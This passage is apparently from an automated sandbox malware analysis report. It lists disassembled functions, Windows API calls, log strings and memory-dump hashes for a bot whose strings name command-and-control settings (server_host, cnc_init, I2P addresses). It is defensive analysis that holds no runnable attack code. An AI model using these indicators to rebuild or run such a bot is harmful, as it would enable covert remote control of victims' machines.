, xrefs: 00007FFE1150D89E
P, xrefs: 00007FFE1150D90F
(value_sz != NULL), xrefs: 00007FFE1150D822
registry_get_value, xrefs: 00007FFE1150D737, 00007FFE1150D790, 00007FFE1150D7C3, 00007FFE1150D7F6, 00007FFE1150D829, 00007FFE1150D88B, 00007FFE1150D9D6, 00007FFE1150DB54
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150D797, 00007FFE1150D7CA, 00007FFE1150D7FD, 00007FFE1150D830
P, xrefs: 00007FFE1150D918

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 8ef715939b3187d01807caee3237308355422bb7c9e516a9105dacea84116d8a
Instruction ID: 9972f9d00a7cf9b7922f6fe7be4b19b4d1ab98aea6415764953720746d05c9c9
Opcode Fuzzy Hash: 8ef715939b3187d01807caee3237308355422bb7c9e516a9105dacea84116d8a
Instruction Fuzzy Hash: 9FA16E61D0CF0B81FB319B87A8403BD725EAF40764F8405BAD95E466B5EFADE985C302

Function 00007FFE13307E42 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE13307E9C
RegQueryValueExA.ADVAPI32 ref: 00007FFE13307FE4

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

(key != NULL), xrefs: 00007FFE13307F3C
(value_sz != NULL), xrefs: 00007FFE13307FA2
(value != NULL), xrefs: 00007FFE13307F6F
(root != NULL), xrefs: 00007FFE13307F09
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE13308012
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13307F17, 00007FFE13307F4A, 00007FFE13307F7D, 00007FFE13307FB0
registry_get_value, xrefs: 00007FFE13307EB7, 00007FFE13307F10, 00007FFE13307F43, 00007FFE13307F76, 00007FFE13307FA9, 00007FFE1330800B, 00007FFE13308156, 00007FFE133082D4
P, xrefs: 00007FFE1330808F
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D
NULL, xrefs: 00007FFE1330803E, 00007FFE133082EC, 00007FFE133082F8
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13307EBE
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE13307F02, 00007FFE13307F35, 00007FFE13307F68, 00007FFE13307F9B
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE133082DB
, xrefs: 00007FFE13308027
P, xrefs: 00007FFE13308098
, xrefs: 00007FFE1330801E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 91e22bc91e54bc58e856e97781ef2ffe84c4e6d35a4899b3a718a3367aff592f
Instruction ID: 3744ed14cb7a9b057d371dbbe0ab57edd8688f12908ec84d80c6af27f74464f2
Opcode Fuzzy Hash: 91e22bc91e54bc58e856e97781ef2ffe84c4e6d35a4899b3a718a3367aff592f
Instruction Fuzzy Hash: BCA1126090CF0B99FA349747EC0137D2A54AF20774F5401B2D93E2A7B6EEADA9859309

Function 00007FFE0EB42472 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB424CC
RegQueryValueExA.ADVAPI32 ref: 00007FFE0EB42614

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

(root != NULL), xrefs: 00007FFE0EB42539
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB42547, 00007FFE0EB4257A, 00007FFE0EB425AD, 00007FFE0EB425E0
P, xrefs: 00007FFE0EB426C8
(value != NULL), xrefs: 00007FFE0EB4259F
, xrefs: 00007FFE0EB42657
(value_sz != NULL), xrefs: 00007FFE0EB425D2
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EB4290B
P, xrefs: 00007FFE0EB426BF
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D
(key != NULL), xrefs: 00007FFE0EB4256C
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EB42532, 00007FFE0EB42565, 00007FFE0EB42598, 00007FFE0EB425CB
NULL, xrefs: 00007FFE0EB4266E, 00007FFE0EB4291C, 00007FFE0EB42928
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0EB42642
registry_get_value, xrefs: 00007FFE0EB424E7, 00007FFE0EB42540, 00007FFE0EB42573, 00007FFE0EB425A6, 00007FFE0EB425D9, 00007FFE0EB4263B, 00007FFE0EB42786, 00007FFE0EB42904
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EB424EE
, xrefs: 00007FFE0EB4264E

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
Instruction ID: 2667aeca55bc9b5327690d97f469b3a4314182f243a021d48afd402c142183d7
Opcode Fuzzy Hash: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
Instruction Fuzzy Hash: 1BA14CA5E0C74B81FA709F44A8403B87354EF04744F940132EADE466B9EE6DEE85EF42

Function 00007FFE0EBD8702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EBD875C
RegQueryValueExA.ADVAPI32 ref: 00007FFE0EBD88A4

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

(key != NULL), xrefs: 00007FFE0EBD87FC
(root != NULL), xrefs: 00007FFE0EBD87C9
NULL, xrefs: 00007FFE0EBD88FE, 00007FFE0EBD8BAC, 00007FFE0EBD8BB8
, xrefs: 00007FFE0EBD88DE
P, xrefs: 00007FFE0EBD894F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD87D7, 00007FFE0EBD880A, 00007FFE0EBD883D, 00007FFE0EBD8870
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D
, xrefs: 00007FFE0EBD88E7
registry_get_value, xrefs: 00007FFE0EBD8777, 00007FFE0EBD87D0, 00007FFE0EBD8803, 00007FFE0EBD8836, 00007FFE0EBD8869, 00007FFE0EBD88CB, 00007FFE0EBD8A16, 00007FFE0EBD8B94
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0EBD88D2
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EBD87C2, 00007FFE0EBD87F5, 00007FFE0EBD8828, 00007FFE0EBD885B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EBD877E
(value != NULL), xrefs: 00007FFE0EBD882F
(value_sz != NULL), xrefs: 00007FFE0EBD8862
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EBD8B9B
P, xrefs: 00007FFE0EBD8958

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 21a027e01d0a802bb0402d144294a9673ea0a9f2328124885c32d9706be0d8ac
Instruction ID: fbce9830c482c0859451cc1e8781d26d5f25121d2fd6d09f45708c3332e6329a
Opcode Fuzzy Hash: 21a027e01d0a802bb0402d144294a9673ea0a9f2328124885c32d9706be0d8ac
Instruction Fuzzy Hash: 4DA1276090C70B81FA389F04A8403FA2350AF1074AF541136DADE467B9FEAEF985DF46

Function 00007FFE0EC09702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EC0975C
RegQueryValueExA.ADVAPI32 ref: 00007FFE0EC098A4

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EC097D7, 00007FFE0EC0980A, 00007FFE0EC0983D, 00007FFE0EC09870
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EC0977E
P, xrefs: 00007FFE0EC0994F
P, xrefs: 00007FFE0EC09958
(value_sz != NULL), xrefs: 00007FFE0EC09862
(value != NULL), xrefs: 00007FFE0EC0982F
(key != NULL), xrefs: 00007FFE0EC097FC
(root != NULL), xrefs: 00007FFE0EC097C9
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EC097C2, 00007FFE0EC097F5, 00007FFE0EC09828, 00007FFE0EC0985B
, xrefs: 00007FFE0EC098DE
registry_get_value, xrefs: 00007FFE0EC09777, 00007FFE0EC097D0, 00007FFE0EC09803, 00007FFE0EC09836, 00007FFE0EC09869, 00007FFE0EC098CB, 00007FFE0EC09A16, 00007FFE0EC09B94
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
, xrefs: 00007FFE0EC098E7
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0EC098D2
NULL, xrefs: 00007FFE0EC098FE, 00007FFE0EC09BAC, 00007FFE0EC09BB8
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EC09B9B

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
Instruction ID: c1bb9daeef389e582dc7a15a761058b666412f794126ca6ca53f4188ea715aac
Opcode Fuzzy Hash: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
Instruction Fuzzy Hash: DCA11F6091C7CBA1FA309B80A8C13B96254AFC6349F540132D9DE467B7EE7FA985D343

Function 00007FFE0E16B0E2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0E16B13C
RegQueryValueExA.ADVAPI32 ref: 00007FFE0E16B284

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

(root != NULL), xrefs: 00007FFE0E16B1A9
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
, xrefs: 00007FFE0E16B2BE
NULL, xrefs: 00007FFE0E16B2DE, 00007FFE0E16B58C, 00007FFE0E16B598
(value != NULL), xrefs: 00007FFE0E16B20F
registry_get_value, xrefs: 00007FFE0E16B157, 00007FFE0E16B1B0, 00007FFE0E16B1E3, 00007FFE0E16B216, 00007FFE0E16B249, 00007FFE0E16B2AB, 00007FFE0E16B3F6, 00007FFE0E16B574
, xrefs: 00007FFE0E16B2C7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16B1B7, 00007FFE0E16B1EA, 00007FFE0E16B21D, 00007FFE0E16B250
(key != NULL), xrefs: 00007FFE0E16B1DC
P, xrefs: 00007FFE0E16B32F
(value_sz != NULL), xrefs: 00007FFE0E16B242
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0E16B2B2
P, xrefs: 00007FFE0E16B338
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0E16B1A2, 00007FFE0E16B1D5, 00007FFE0E16B208, 00007FFE0E16B23B
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0E16B57B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0E16B15E

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
Instruction ID: e0be538e72c5d9ca48400dccdab6c26f61b90234eaf67667fe3a28693ca64aa8
Opcode Fuzzy Hash: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
Instruction Fuzzy Hash: 6CA15E60E0C75B82FB349B00A944BB93260AF54788F540137DADE867B7EF6DE985C342

Function 00007FFE11503D25 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFE11503F3A
GetLastError.KERNEL32 ref: 00007FFE11503F9B

Strings

Done, xrefs: 00007FFE11503F7C
cnc_init, xrefs: 00007FFE11503EED, 00007FFE11503F53, 00007FFE11503F83, 00007FFE11503FAD
routine_rx, xrefs: 00007FFE11503F4C, 00007FFE11503FA6
[I] (%s) -> %s, xrefs: 00007FFE11503F8A
, xrefs: 00007FFE11503FC0
server_port, xrefs: 00007FFE11503D9A
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE11503F5A
cnccli, xrefs: 00007FFE11503D63, 00007FFE11503DA1, 00007FFE11503DE2, 00007FFE11503E23, 00007FFE11503E64, 00007FFE11503E97
i2p_sam3_timeo, xrefs: 00007FFE11503E5D
server_host, xrefs: 00007FFE11503D5C
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11503EF4
server_timeo, xrefs: 00007FFE11503DDB
i2p_try_num, xrefs: 00007FFE11503E1C
i2p_addr, xrefs: 00007FFE11503E90
~, xrefs: 00007FFE11504015
P, xrefs: 00007FFE1150401A
[E] (%s) -> CreateThread(%s) failed(gle=%lu), xrefs: 00007FFE11503FB4

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
API String ID: 1689873465-2891999747
Opcode ID: 9aa31627ddd2c6ffe85cc1af262b3380d497ea8405b81abd2497743e5f52b55d
Instruction ID: a75eeebe7889d987e3d37cc514e3759e92a68fb5896b3aec63fe0fd1bc7c58d0
Opcode Fuzzy Hash: 9aa31627ddd2c6ffe85cc1af262b3380d497ea8405b81abd2497743e5f52b55d
Instruction Fuzzy Hash: EB916D21A0CF4399F7619B96A8843BD229EAB05378F5402B9D46D472F2DF7CE949C341

Function 00007FF6BFD6227B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FF6BFD622A3
fclose.MSVCRT ref: 00007FF6BFD622D5
_errno.MSVCRT ref: 00007FF6BFD6238F
_errno.MSVCRT ref: 00007FF6BFD623B0
fwrite.MSVCRT ref: 00007FF6BFD62424

Strings

fs_file_write, xrefs: 00007FF6BFD62305, 00007FF6BFD6233B, 00007FF6BFD6236B, 00007FF6BFD6239D, 00007FF6BFD6244D, 00007FF6BFD624FD
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF6BFD62454
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF6BFD6230C
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF6BFD623A4
(mode != NULL), xrefs: 00007FF6BFD62364
NULL, xrefs: 00007FF6BFD624DA, 00007FF6BFD624E6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD62342, 00007FF6BFD62372
(path != NULL), xrefs: 00007FF6BFD62334
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF6BFD62504
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD6232D, 00007FF6BFD6235D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-961576452
Opcode ID: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
Instruction ID: 5eeecb7f588019d38fbe27f31ceb0efd2ab35872d8ecae5937953d591e6df461
Opcode Fuzzy Hash: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
Instruction Fuzzy Hash: 15515C61A09643A1FA109BDDE9442B83311AF54799F580B32EB4DCBAF5DF3CF6468380

Function 00007FFE11505A5E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11505A7D
CreateDirectoryA.KERNEL32 ref: 00007FFE11505A9F
GetLastError.KERNEL32 ref: 00007FFE11505AF0
strcpy.MSVCRT ref: 00007FFE11505B41
strlen.MSVCRT ref: 00007FFE11505B49
strlen.MSVCRT ref: 00007FFE11505B65
strlen.MSVCRT ref: 00007FFE11505B76
CreateDirectoryA.KERNEL32 ref: 00007FFE11505BE7
GetLastError.KERNEL32 ref: 00007FFE11505BF1

Strings

[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE11505BA0
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11505AC0
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE11505B09
(path != NULL), xrefs: 00007FFE11505AC7
fs_dir_create, xrefs: 00007FFE11505ACE, 00007FFE11505B02, 00007FFE11505B99, 00007FFE11505CBF, 00007FFE11505D26
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE11505CC6
NULL, xrefs: 00007FFE11505D17
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE11505D2D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505AD5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

